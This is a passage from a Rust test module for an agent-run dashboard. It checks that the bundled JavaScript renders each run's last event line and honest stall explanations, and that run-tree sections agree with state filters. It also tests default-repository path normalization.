8855 assert!(APP_JS.contains("renderRunActions"));
8856
8857 assert!(APP_JS.contains("armedFold"));
8859 assert!(APP_JS.contains("Yes, fold worktrees"));
8860
8861 assert!(APP_JS.contains("can no longer be resumed"));
8864 }
8865
8866 #[test]
8867 fn a_finished_run_explains_itself_with_its_own_last_line() {
8868 assert!(
8874 !APP_JS.contains("collapsed on agent quota"),
8875 "a stall must not be explained by a cause the deck did not check"
8876 );
8877 assert!(
8878 !APP_JS.contains("Review rounds ran out with findings still open, or the gate failed"),
8879 "and a block must not offer a guess with an `or` in it"
8880 );
8881
8882 assert!(
8886 APP_JS.contains("setText(r.event, run.event || \"\")"),
8887 "the run's last line is rendered unconditionally"
8888 );
8889 assert!(
8890 !APP_JS.contains("moving && run.event"),
8891 "and never gated on the run still moving"
8892 );
8893
8894 assert!(APP_JS.contains("lost to quota"));
8896 }
8897
8898 #[test]
8920 fn runs_tree_sections_and_state_chips_agree_on_what_a_run_can_be() {
8921 let shapes_marker = "const REPRESENTATIVE_RUN_SHAPES = [";
8922 let shapes_body_start =
8923 APP_JS.find(shapes_marker).expect("the shape list exists") + shapes_marker.len();
8924 let shapes_close = APP_JS[shapes_body_start..]
8925 .find("].map(")
8926 .expect("the shape list is closed by its done-computing .map(...)")
8927 + shapes_body_start;
8928 let shapes_src = &APP_JS[shapes_body_start..shapes_close];
8929
8930 let mut shapes: Vec<(bool, String, bool)> = Vec::new();
8931 for entry in shapes_src.split('{').skip(1) {
8932 let waiting = entry.contains("waiting: true");
8933 let dead = entry.contains("live: \"dead\"");
8934 let status_at =
8935 entry.find("status: \"").expect("each shape names a status") + "status: \"".len();
8936 let status_end = entry[status_at..]
8937 .find('"')
8938 .expect("the status string is closed")
8939 + status_at;
8940 shapes.push((waiting, entry[status_at..status_end].to_string(), dead));
8941 }
8942 assert!(shapes.len() >= 6, "parsed shapes: {shapes:?}");
8943
8944 let done_rule_marker = "done: !";
8948 let done_rule_at = APP_JS[shapes_close..]
8949 .find(done_rule_marker)
8950 .expect("the done rule follows the shape list")
8951 + shapes_close
8952 + done_rule_marker.len();
8953 let includes_at = APP_JS[done_rule_at..]
8954 .find(".includes(shape.status)")
8955 .expect("the done rule ends in .includes(shape.status)")
8956 + done_rule_at;
8957 let not_done: Vec<&str> = APP_JS[done_rule_at..includes_at]
8958 .trim()
8959 .trim_start_matches('[')
8960 .trim_end_matches(']')
8961 .split(',')
8962 .map(|s| s.trim().trim_matches('"'))
8963 .filter(|s| !s.is_empty())
8964 .collect();
8965
8966 let shapes: Vec<(bool, String, bool, bool)> = shapes
8967 .into_iter()
8968 .map(|(waiting, status, dead)| {
8969 let done = !not_done.contains(&status.as_str());
8970 (waiting, status, dead, done)
8971 })
8972 .collect();
8973
8974 fn run_section(waiting: bool, status: &str, dead: bool) -> &'static str {
8978 if waiting {
8979 return "waiting";
8980 }
8981 if dead
8982 && !matches!(
8983 status,
8984 "merged" | "ready" | "stalled" | "blocked" | "failed" | "verified_noop"
8985 )
8986 {
8987 return "stale";
8988 }
8989 match status {
8990 "merged" | "ready" => "landed",
8991 "stalled" | "blocked" | "failed" | "verified_noop" => "ended",
8992 _ => "flight",
8993 }
8994 }
8995
8996 fn filter_matches(filter_key: &str, waiting: bool, dead: bool, done: bool) -> bool {
8999 match filter_key {
9000 "active" => !done,
9001 "flight" => !done && !waiting && !dead,
9002 "stale" => !done && !waiting && dead,
9003 "waiting" => waiting,
9004 "done" => done,
9005 "all" => true,
9006 other => panic!("unknown RUN_STATE_FILTERS key: {other}"),
9007 }
9008 }
9009
9010 let compatible = |section: &str, filter_key: &str| {
9011 shapes.iter().any(|(waiting, status, dead, done)| {
9012 run_section(*waiting, status, *dead) == section
9013 && filter_matches(filter_key, *waiting, *dead, *done)
9014 })
9015 };
9016
9017 let expected = [
9022 ("waiting", [true, false, false, true, true, true]),
9023 ("stale", [true, false, true, false, false, true]),
9024 ("flight", [true, true, false, false, false, true]),
9025 ("landed", [false, false, false, false, true, true]),
9026 ("ended", [false, false, false, false, true, true]),
9027 ];
9028 let filter_keys = ["active", "flight", "stale", "waiting", "done", "all"];
9029
9030 for (section, wants) in expected {
9031 for (filter_key, want) in filter_keys.iter().zip(wants) {
9032 assert_eq!(
9033 compatible(section, filter_key),
9034 want,
9035 "section {section:?} x filter {filter_key:?} should be compatible: {want}"
9036 );
9037 }
9038 }
9039
9040 assert!(
9043 APP_JS.contains("function sectionCompatibleWithStateFilter(sectionKey, filterKey)")
9044 );
9045 assert!(APP_JS.contains(
9046 "if (state.runsFilter.section && !sectionCompatibleWithStateFilter(state.runsFilter.section, key))"
9047 ));
9048 assert!(APP_JS.contains(
9049 "if (!same && !sectionCompatibleWithStateFilter(section, state.runsStateFilter))"
9050 ));
9051 }
9052
9053 #[tokio::test]
9054 async fn normalize_default_repo_leaves_an_explicit_path_untouched() {
9055 let dir = tempfile::tempdir().expect("tempdir");
9059 let explicit = dir.path().join("not-a-checkout");
9060 std::fs::create_dir_all(&explicit).expect("create dir");
9061 assert_eq!(normalize_default_repo(explicit.clone()).await, explicit);
9062
9063 let missing = dir.path().join("does-not-exist-at-all");
9064 assert_eq!(normalize_default_repo(missing.clone()).await, missing);
9065 }
9066}